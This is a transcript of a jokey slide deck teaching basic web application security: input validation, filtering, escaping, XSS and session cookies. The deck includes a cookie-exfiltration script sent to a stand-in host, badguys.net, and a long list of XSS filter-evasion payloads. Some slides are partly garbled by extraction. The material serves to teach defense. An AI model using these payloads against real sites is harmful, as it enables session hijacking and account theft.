basic web application security. user input kick your arse
Post on 22-Dec-2015
219 views
TRANSCRIPT
![Page 1: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/1.jpg)
Basic WebApplication
Security
![Page 2: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/2.jpg)
User Input
![Page 3: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/3.jpg)
![Page 4: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/4.jpg)
Kick Your Arse
![Page 5: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/5.jpg)
![Page 6: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/6.jpg)
Three Ways(All Awesome)
![Page 7: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/7.jpg)
Validation
![Page 8: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/8.jpg)
Passive(No touchy-touchy)
![Page 9: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/9.jpg)
This is a Number.
2
![Page 10: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/10.jpg)
This is not a Number.
a
![Page 11: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/11.jpg)
This is really not a Number.
<script>alert(‘loldongs’)</script>
![Page 12: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/12.jpg)
Filtering
![Page 13: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/13.jpg)
Destructive(One-Way Street)
![Page 14: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/14.jpg)
Only letting the good stuff in.
![Page 15: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/15.jpg)
or
![Page 16: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/16.jpg)
Keeping out the bad stuff.
![Page 17: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/17.jpg)
What’s the diff?(Bro.)
![Page 18: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/18.jpg)
Both can be error-prone...
![Page 19: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/19.jpg)
White-Listing Usability Problems
What happens whenyou screw it up?
Black-Listing Security Problems
(Always a trade-off.)
![Page 20: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/20.jpg)
Escaping
![Page 21: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/21.jpg)
TransportPoint A Point B
![Page 22: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/22.jpg)
Data will be the same on both
sides.
![Page 23: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/23.jpg)
Different Media,Different Escaping
![Page 24: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/24.jpg)
HTML
<b>Huh.</b>
<p><i><b>Huh.</b></i></p>
<b>Huh</b>
![Page 25: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/25.jpg)
SQL
Sam O’Brien
INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);
1, Sam O’Brien, 2010-09-02 18:30:00
![Page 26: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/26.jpg)
XSS(Cross-Site Scripting)
![Page 27: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/27.jpg)
(XTREME Site Scripting)
SS
![Page 28: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/28.jpg)
Sticking Scripts Where They
Don’t Belong.You there, down the back.
Stop sniggering.
![Page 29: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/29.jpg)
<script>alert(‘HACKED BY LOLDONGS’)
</script>
Amateurs!
![Page 30: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/30.jpg)
<script>alert(document.cookie)
</script>
Hmm.
![Page 31: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/31.jpg)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oh shit.
![Page 32: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/32.jpg)
Why is this uncool?
(Yeah! Why?)
![Page 33: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/33.jpg)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Ooooh shit.
![Page 34: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/34.jpg)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooh shit.
![Page 35: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/35.jpg)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooooooooh shit.
![Page 36: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/36.jpg)
Why is this really uncool?
(Because shut up.)
![Page 37: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/37.jpg)
HTTP
Hyper-Text Thingy I-forgot-again
![Page 38: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/38.jpg)
Stateless
![Page 39: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/39.jpg)
No Idea Who You Are.
![Page 40: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/40.jpg)
It can guess.(Badly.)
IP AddressBrowser User-Agent
![Page 41: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/41.jpg)
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every
request.)
![Page 42: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/42.jpg)
The Server puts a unique ID in
the basket.PHPSESSID=123your456mum
789__utma=12948.23.4211414.5
553is_a_furry=1
![Page 43: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/43.jpg)
Browser sends the ID every
request.
PHPSESSID=123your456mum789
![Page 44: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/44.jpg)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Look again.
![Page 45: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/45.jpg)
THEY HAVE YOUR COOKIE.
Ooooooooooooooooooooooo-
![Page 46: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/46.jpg)
Preventing Shenanigans
![Page 47: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/47.jpg)
HTML
Validation Really Hard.
![Page 48: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/48.jpg)
HTML
Filtering Still Really Hard.
Use a library, eg. HTML Purifier.
![Page 49: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/49.jpg)
HTML
Escaping Dead Easy.
Most languages have stuff to handle this, eg.
htmlentities(), cgi.escape(), CGI.escape()
![Page 50: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/50.jpg)
How hard is filtering?
(It’s just <script>, right?)
![Page 51: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/51.jpg)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img “””><script>alert('a')</script>”>
<IMG
SRC=javascr
ipt:ale
4;
t('XSS')>
<IMG
SRC=javascr
ipt:aler
t('XSS')>
<IMG SRC="jav ascript:alert('a');“>
(Well, then.)
<IMG SRC="jav	asœript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src=”javascript:alert('a')”
![Page 52: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/52.jpg)
THIS HARD.
<iframe src=http://foo/x.html <
<body background=”javascript:alert('a')”>
<BODY ONLOAD=alert('a')>
<img dynsrc=”javascript:alert('a')”>
<img lowsrc=”javascript:alert('a')”>
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE=”&{alert('a')}”>
<LAYER SRC=”http://foo/x.html”></LAYER>
<link rel=”stylesheet” href=”javascript:alert('a');”>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox(“a”)'>
<img src=”livescript:alert('a')”>
žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)
<META HTTP-EQUIV=”refresh”
CONTENT=”0;url=javascript:alert('a');”>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
![Page 53: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/53.jpg)
THIS HARD.<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\
006a
\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061
\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\
0029">
<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/
*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-
image:url("javascript:alert('a')");}</STYLE><A
CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf"
AllowScriptAccess="always"></EMBED>
<EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd
....jwvc3ZnPg=="
type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!
[CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
![Page 54: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/54.jpg)
One more thing about XSS.
(Groan.)
![Page 55: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/55.jpg)
Remember <script>alert()</script>
?
(Yes, I do. Shut up.)
![Page 56: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/56.jpg)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
![Page 57: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/57.jpg)
Do you have any forms on your page?
(Yes.)
![Page 58: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/58.jpg)
Do you have any javascript functions your site uses to do anything
useful?
(... Yes.)
![Page 59: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/59.jpg)
Do your site make any AJAX calls to do anything useful?
(... Oh.)
![Page 60: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/60.jpg)
That injected code can trigger forms, run
javascript functions, or make AJAX calls.
(... Oooooh.)
![Page 61: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/61.jpg)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
![Page 62: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/62.jpg)
Or store something that will output this on someone’s profile
page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
![Page 63: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/63.jpg)
... And you’re hosed.
(Shit.)
![Page 64: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/64.jpg)
The Human Element
Touchy-Feely Commie Bullshit.
![Page 65: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/65.jpg)
We are very fallible.
![Page 66: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/66.jpg)
We will forget things.
![Page 67: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/67.jpg)
When time gets short, we take the easy path.
![Page 68: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/68.jpg)
Design systems so that they naturally
encourage security.
![Page 69: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/69.jpg)
SQL
Insert(“INSERT INTOposts VALUES
(‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’,
‘”.sql_safe($author).”’)”);
![Page 70: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/70.jpg)
SQL
or
![Page 71: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/71.jpg)
SQL
insert(“INSERT INTOposts VALUES
(:title, :content, :author)”,$title, $content, $author);
![Page 72: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/72.jpg)
HTML
<h3><%= title %> - <%= date %><h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>
![Page 73: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/73.jpg)
HTML
or
![Page 74: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/74.jpg)
HTML
<h3><?=htmlentities($title);?> - <?=htmlentities(date);?><h3>
<div><?=$post_body;?></div><p>Written by <?
=htmlentities($author);?></p>
![Page 75: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/75.jpg)
Questions?
![Page 76: Basic Web Application Security. User Input Kick Your Arse](https://reader030.vdocuments.site/reader030/viewer/2022032523/56649d775503460f94a598fa/html5/thumbnails/76.jpg)
Now get out.